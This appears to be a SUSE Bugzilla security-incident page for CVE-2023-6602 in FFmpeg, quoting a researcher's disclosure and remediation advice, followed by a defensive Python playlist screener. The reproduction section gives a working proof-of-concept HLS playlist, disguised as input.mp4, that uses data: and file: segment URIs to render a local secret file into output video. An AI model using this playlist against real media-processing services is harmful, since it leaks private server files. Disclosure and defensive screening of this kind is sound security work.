Bug 1220546 (CVE-2023-6602) - VUL-0: CVE-2023-6602: ffmpeg,ffmpeg-4:HLS Force TTY Demuxer
Summary: VUL-0: CVE-2023-6602: ffmpeg,ffmpeg-4:HLS Force TTY Demuxer
Status: NEW
Alias: CVE-2023-6602
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Assignee: E-mail List
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/395219/
Whiteboard: CVSSv3.1:SUSE:CVE-2023-6602:3.3:(AV:L...
Keywords:
Depends on:
Blocks:
 
Reported: 2024-02-28 11:01 UTC by SMASH SMASH
Modified: 2024-07-03 05:19 UTC

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
stoyan.manolov: needinfo? (gnome-bugs)


Description SMASH SMASH 2024-02-28 11:01:31 UTC
FFmpeg Findings 2023.12.01
Overview
Included in this document are five (5) bugs in the open-source package ffmpeg. Internal CVSS 3.1 scoring for these bugs ranges from 3.9 to 7.2. Attribution for these findings: Harvey Phillips of Amazon Element55 (element55@amazon.com).

If the recipient of this notice (secalert@redhat.com) has any questions regarding these findings, please do not hesitate to contact us at element55@amazon.com.

II. HLS Force TTY Demuxer
Affected Versions: 2.0 (at least) → 6.0 (latest)

There is a commit upstream which prevents this issue by enforcing a file extension check on HLS playlists. Currently this commit is not in any FFmpeg release branch (6.0 being the latest).




Suggested CVSS 3.1: 5.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary
For an instance of FFmpeg that does not enforce an input format, the TTY demuxer can be triggered even when the input file does not meet the TTY requirements.


Impact
The TTY demuxer treats all input as ASCII and renders it in the video output. This issue could therefore allow for possible data exfiltration.


Description
The TTY demuxer is normally only triggered if the input file has one of the following extensions: ans, art, asc, diz, ice, nfo, txt, or vt. Applying (1) but using e.g. the .ans extension produces an error:



[hls @ 0xaaab130f79c0] Filename extension of 'data://text/plain;base64,QUFBQUFBQUEK=.ans' is not a common multimedia extension, blocked for security reasons.
If you wish to override this adjust allowed_extensions, you can set it to 'ALL' to allow all

However, FFmpeg continues to parse the remainder of the segments in the HLS playlist with the TTY demuxer.


Reproduction
Example Input (input.mp4):


#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1,
data://text/plain;base64,QUFBQUFBQUEK=.ans
#EXTINF:1,
data://text/plain;base64,IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwoK=.m3u8
#EXTINF:1,
file:///some/secret/file/with/a/media/extension.ext
#EXT-X-ENDLIST


Trigger with ffmpeg -i input.mp4 output.mp4. Playing output.mp4 will show the contents of the file in the file:// URI printed out in the video playback.


Remediation
If the common multimedia extension check fails, the demuxer that was identified should be discarded and the identification process should begin anew with the next input in the playlist.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6602
https://bugzilla.redhat.com/show_bug.cgi?id=2253172
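
A pre-transcode screen for the condition described in the Summary and Reproduction above, as an added example (not FFmpeg's fix and not code from the report): it recognises an HLS playlist by content rather than by file name and flags segment URIs that use a non-HTTP(S) scheme or one of the TTY extensions listed in the Description. The function names, the HTTP(S)-only policy and the accepted playlist names are assumptions of this example.

```python
from urllib.parse import urlsplit

# Extensions the report lists as normally selecting the TTY demuxer.
TTY_EXTENSIONS = {"ans", "art", "asc", "diz", "ice", "nfo", "txt", "vt"}
# Assumptions: HTTP(S)-only segments; playlists only under these names.
ALLOWED_SCHEMES = {"http", "https"}
PLAYLIST_EXTENSIONS = {"m3u8", "m3u"}

def extension(name):
    """Lower-cased text after the last dot, or '' when there is none."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def is_hls_playlist(text):
    """Recognise a playlist by its content, not by its file name."""
    return text.lstrip("\ufeff \t\r\n").startswith("#EXTM3U")

def audit_playlist(text):
    """Return (line_no, uri, reasons) for each segment URI worth refusing."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        uri = line.strip()
        if not uri or uri.startswith("#"):
            continue  # tag/comment line; URI= attributes in tags are out of scope here
        parts = urlsplit(uri)
        reasons = []
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            reasons.append(f"scheme '{parts.scheme or 'relative'}' not allowed")
        if extension(parts.path) in TTY_EXTENSIONS:
            reasons.append("extension maps to the TTY demuxer")
        if reasons:
            findings.append((no, uri, reasons))
    return findings

def screen_upload(filename, text):
    """Reasons to refuse a file before transcoding; empty list means pass."""
    if not is_hls_playlist(text):
        return []
    problems = []
    if extension(filename) not in PLAYLIST_EXTENSIONS:
        problems.append(f"{filename}: HLS playlist content under a non-playlist name")
    for no, uri, reasons in audit_playlist(text):
        problems.append(f"line {no}: {'; '.join(reasons)}")
    return problems

# Constructed sample shaped like the report's input.mp4 (the https URI is made up).
SAMPLE = ("#EXTM3U\n#EXTINF:1,\ndata://text/plain;base64,QUFBQUFBQUEK=.ans\n"
          "#EXTINF:1,\nfile:///some/secret/file/with/a/media/extension.ext\n"
          "#EXTINF:1,\nhttps://cdn.example.invalid/seg2.ts\n#EXT-X-ENDLIST\n")
```

`screen_upload("input.mp4", SAMPLE)` returns three reasons: the name mismatch plus one entry each for the `data:` and `file:` segments.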